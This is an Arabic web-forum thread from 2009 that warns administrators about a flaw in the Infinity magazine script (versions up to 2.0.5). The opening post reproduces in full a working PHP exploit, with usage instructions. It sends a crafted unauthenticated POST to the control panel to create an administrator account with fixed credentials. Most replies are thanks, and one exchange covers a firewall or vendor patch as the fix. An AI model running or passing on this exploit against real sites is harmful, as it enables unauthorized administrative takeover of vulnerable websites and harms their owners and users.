التميز خلال 24 ساعة
 العضو الأكثر نشاطاً هذا اليوم   الموضوع النشط هذا اليوم   المشرف المميزلهذا اليوم    المشرفة المميزه 

&& لا يهمك &&
بقلم : نايف سلمى

قريبا
تتوالى مسيرة العطاء هنا في بعد حيي الى ان يحين قطاف الثمر فيطيب المذاق وتتراكض الحروف وتتراقص النغمات عبر كلماتكم ونبض مشاعركم وسنا اقلامكم وصدق ابجدياتكم ونقآء قلوبكم وطهر اصالتكم فآزهرت بها اروقة المنتدى واينعت . فانتشت الارواح بعطر اقلامكم الآخاذ و امتزجت ببساطة الروح وعمق المعنى ورقي الفكر .. هذا هو آنتم دانه ببحر بعد حيي تتلألأ بانفراد وتميز فلا يمكن لمداها العاصف ان يتوقف ولا لانهارها ان تجف ولا لشمس ابداعها ان تغرب.لذلك معا نصل للمعالي ونسمو للقمم ..... دمتم وطبتم دوما وابدا ....... (منتديات بعد حيي).. هنا في منتديات بعد حيي يمنع جميع الاغاني ويمنع اي صور غير لائقه او تحتوي على روابط منتديات ويمنع وضع اي ايميل بالتواقيع .. ويمنع اي مواضيع فيها عنصريه قبليه او مذهبيه منعا باتاا .....اجتمعنا هنا لنكسب الفائده وليس لنكسب الذنوب وفق الله المسلمين للتمسك بدينهم والبصيرة في أمرهم إنه قريب مجيب جزاكم الله خير ا ........ كل الود لقلوبكم !! كلمة الإدارة


عدد مرات النقر : 281
عدد  مرات الظهور : 10,519,551
عدد مرات النقر : 185
عدد  مرات الظهور : 10,518,906
عدد مرات النقر : 246
عدد  مرات الظهور : 10,517,616
 
 
العودة   منتديات بعد حيي > المــــنتديات التقنيـــــة > منتدى الكمبيوتر والإنترنت - وتطوير المنتديات
 
 
« آخـــر الـــمـــشـــاركــــات »
         :: لاتستخدمو بف باف (آخر رد :قاسيون)       :: مواطن في مدينة حائل يكافئ موظفا مصريا يعمل عنده ببناء مسجد باسمه (آخر رد :الزميلي)       :: &( يعيش ملموم بين لظم وألأحضان )& (آخر رد :شاعر قوافي)       :: خذيت عشرة من مخباتك😂 (آخر رد :شبام)       :: اقولك ولعي اللمبه (آخر رد :شبام)       :: الأجفر” يتوّج بطلاً لبطولة الأمير عبدالعزيز بن سعد (آخر رد :شبام)       :: فوائد السبع تمرات (آخر رد :بنت البدو)       :: && لا يهمك && (آخر رد :بنت البدو)       :: $$( نسيت عهدك طواه البعدوالنسيان )$$ (آخر رد :شبام)       :: غيّر اسمك من ابشر (آخر رد :ابو طارق الشمري)      

الإهداءات
ذيب اجا من هون : صبحهم بالخير والمسرات والافراح     وتم بعيد من اممم الوَتَمْ ..! : يخجل الخلوق ، فَ يتمادى البجيح ..!     بنت بقعاء من الاخضر : الف الف مبروك فوز الاخضر وعقبال الكاس     مزون شمر من ساري : شكرا لك ساري على اهتمامك عادي حصل خير وربي من فتح المنتدى انفتح قلبي رغم اني مقصره بالمشاركات حيل     الـ ساري من بعد حيكم : السموحه على توقف المنتدى لأسباب خارجه عن الاراده حقكمـ علي 🌺🌺🌺     عيونك اوطاني من الجوف : مبروك للمنتخب لبلوغ كاس العالم     ♥ غفوة حلم ♥ من المنتدى : حمدلله على العوده بسلام    

إضافة رد
 
 
 
أدوات الموضوع انواع عرض الموضوع
قديم 08-16-2009, 01:45 AM   #1


الصورة الرمزية مخاوي الكيبورد
مخاوي الكيبورد غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13918
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 08-07-2010 (07:08 AM)
 المشاركات : 161 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue
03 [ ترقيع ] ثغرة بمجلة الانفنتي !



http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit

كود PHP:
          <?php
print_r
('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                    

USAGE: php whatever.php localhost /infinity/


'
);

ini_set("max_execution_time",0);

 function 
QABANDI($victim,$vic_dir){
$host $victim;
$p "http://".$host.$vic_dir;




          
$data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          
$packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          
$packet.="****************************-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="****************************-Length: ".strlen($data)."\r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;



         
//print $packet;
    
$o = @fsockopen($host80);
    if(!
$o){
        echo 
"\n[x] No response...\n";
        die;
    }
    
    
fputs($o$packet);
    while (!
feof($o)) $data .= fread($o1024);
    
fclose($o);
    
    
$_404 strstr$data"HTTP/1.1 404 Not Found" );
    if ( !empty(
$_404) ){
        echo 
"\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    
        
$_401 strstr$data"401 Authorization Required" );
    if ( !empty(
$_401) ){
        echo 
"\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                          
                                           echo 
"Admin created !\n\nUsername: qabandi\npassword: qabandi";

 }

$host1 $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);

die;


?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد




 

رد مع اقتباس
قديم 08-16-2009, 02:57 AM   #2


الصورة الرمزية مشعل الليل
مشعل الليل غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3157
 تاريخ التسجيل :  Jun 2006
 أخر زيارة : 08-24-2014 (06:12 AM)
 المشاركات : 112 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شكرا على التنبيه بارك فيك اخي



 

رد مع اقتباس
قديم 08-16-2009, 03:46 AM   #3
واحشني زمانك


الصورة الرمزية نورالدنيا
نورالدنيا غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 5452
 تاريخ التسجيل :  Aug 2007
 أخر زيارة : 08-23-2025 (12:23 AM)
 المشاركات : 15,550 [ + ]
 التقييم :  8746
 الدولهـ
Saudi Arabia
 الجنس ~
Female
لوني المفضل : Deepskyblue

معرض الوسام








الله يكفينا شرها

ومشكور اخوي على التنبيه







 
 توقيع : نورالدنيا



رد مع اقتباس
قديم 08-16-2009, 04:40 AM   #4


الصورة الرمزية الخريصي
الخريصي غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3502
 تاريخ التسجيل :  Oct 2006
 أخر زيارة : 04-06-2015 (03:21 AM)
 المشاركات : 152 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 

رد مع اقتباس
قديم 08-16-2009, 05:46 AM   #5

مشرفة سابقه



الصورة الرمزية محبة الجنه
محبة الجنه غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13067
 تاريخ التسجيل :  Feb 2009
 أخر زيارة : 07-22-2010 (04:44 PM)
 المشاركات : 4,929 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 
 توقيع : محبة الجنه




رد مع اقتباس
قديم 08-16-2009, 12:29 PM   #6


الصورة الرمزية شموخ المحبة
شموخ المحبة غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 14482
 تاريخ التسجيل :  Aug 2009
 أخر زيارة : 08-31-2012 (01:05 PM)
 المشاركات : 709 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue

معرض الوسام



مشكورة الله يعطيك العافية



 

رد مع اقتباس
قديم 08-16-2009, 05:21 PM   #7


الصورة الرمزية مناهي
مناهي غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 4998
 تاريخ التسجيل :  Jun 2007
 أخر زيارة : 11-30-2015 (09:39 PM)
 المشاركات : 18,732 [ + ]
 التقييم :  80
 MMS ~
MMS ~
لوني المفضل : Cadetblue


الله يستر
مخاوي الكيبورد
مشكور على التنبية
والله يعطيكـ العافية



 
 توقيع : مناهي



رد مع اقتباس
قديم 08-17-2009, 03:53 AM   #8


الصورة الرمزية الاخينع
الاخينع غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13844
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 02-26-2011 (04:33 PM)
 المشاركات : 8 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


لازم الاخذ بالحيطه والحذرتقبل مروري مع كل تقدير واحترام لشخصكم الكريم



 

رد مع اقتباس
قديم 08-17-2009, 06:30 AM   #9

مآعآد بدري ..!



الصورة الرمزية جـــود
جـــود غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 7479
 تاريخ التسجيل :  Jun 2008
 أخر زيارة : 08-23-2022 (06:15 PM)
 المشاركات : 13,899 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue

معرض الوسام



مخاوي الكيبورد

الله يكفينا شرها

مشكووور على التنبيه

جود



 
 توقيع : جـــود

لا إله إلا أنت سبحانك إني كنت من الظالمين


رد مع اقتباس
قديم 08-17-2009, 07:55 AM   #10
طروادا
الزوار


الصورة الرمزية طروادا

بيانات اضافيه [ + ]
 رقم العضوية :
 أخر زيارة : 01-01-1970 (03:00 AM)
 المشاركات : n/a [ + ]
لوني المفضل : Cadetblue


استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
دمت مبدعاً استاذ مخاوي



 

رد مع اقتباس
قديم 08-17-2009, 08:52 AM   #11


الصورة الرمزية مخاوي الكيبورد
مخاوي الكيبورد غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13918
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 08-07-2010 (07:08 AM)
 المشاركات : 161 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


اقتباس
المشاركة الأصلية كتبت بواسطة طروادا
استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
دمت مبدعاً استاذ مخاوي

اهلين بالحبيب ..
اقصد بالترقيع الموقت حل مبدئ للثغرة من نظري يكون سهل على كل مستخدمين المجله
السيرفر ماله اي دخل لو نقلت الموقع المصاب على اقوى سيرفر بالعالم راح يضل مصاب
لان الثغرة بملفات الموقع ماهي بالسيرفر ..
طبعا شركة ابعاد المعلومات منتجة مجلة انفنتي اخبرها طرحت اكواد برمجيها ( ترقيع ) للملف المصاب بالسكربت
على مايقولون كل الطرق تودئ الى روما ( جدار ناري او ترقيع برمجي ) كلها تمنع تطبيق الثغرة اعلاه ..
نورت



 

رد مع اقتباس
قديم 08-18-2009, 04:45 PM   #12


الصورة الرمزية الـ ساري
الـ ساري غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 15
 تاريخ التسجيل :  Apr 2004
 أخر زيارة : 10-21-2025 (08:00 AM)
 المشاركات : 12,108 [ + ]
 التقييم :  24322
لوني المفضل : Cadetblue


بارك فيك ورعاك وحفظك الله على التحذير
الذي عانينا منه
بيوم من الايام
اشكرك وفقك الله ودمت لنا غالينا



 

رد مع اقتباس
قديم 08-18-2009, 10:56 PM   #13


الصورة الرمزية ياسر العلهوب
ياسر العلهوب غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 12913
 تاريخ التسجيل :  Jan 2009
 أخر زيارة : 04-17-2013 (02:39 PM)
 المشاركات : 300 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شكرا على التنبيه بارك فيك اخي





 
 توقيع : ياسر العلهوب



رد مع اقتباس
قديم 08-20-2009, 04:09 AM   #14


الصورة الرمزية تنوره
تنوره غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3737
 تاريخ التسجيل :  Nov 2006
 أخر زيارة : 05-14-2011 (11:19 PM)
 المشاركات : 21 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


موفق بإذن الله ... لك مني أجمل تحية .



 

رد مع اقتباس
قديم 08-21-2009, 01:54 AM   #15


الصورة الرمزية حايليه
حايليه متصل الآن

بيانات اضافيه [ + ]
 رقم العضوية : 7212
 تاريخ التسجيل :  Apr 2008
 أخر زيارة : اليوم (05:30 AM)
 المشاركات : 442 [ + ]
 التقييم :  2822
لوني المفضل : Cadetblue


تسلم ومشكور اخوي على التنبيه



 

رد مع اقتباس
 
 
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

(عرض الكل الاعضاء الذين شاهدو هذا الموضوع: 2
,

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 12:37 PM.


Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. TranZ By Almuhajir
HêĽм √ 3.2 OPS BY: ! ωαнαм ! © 2010
Ads Organizer 3.0.3 by Analytics - Distance Education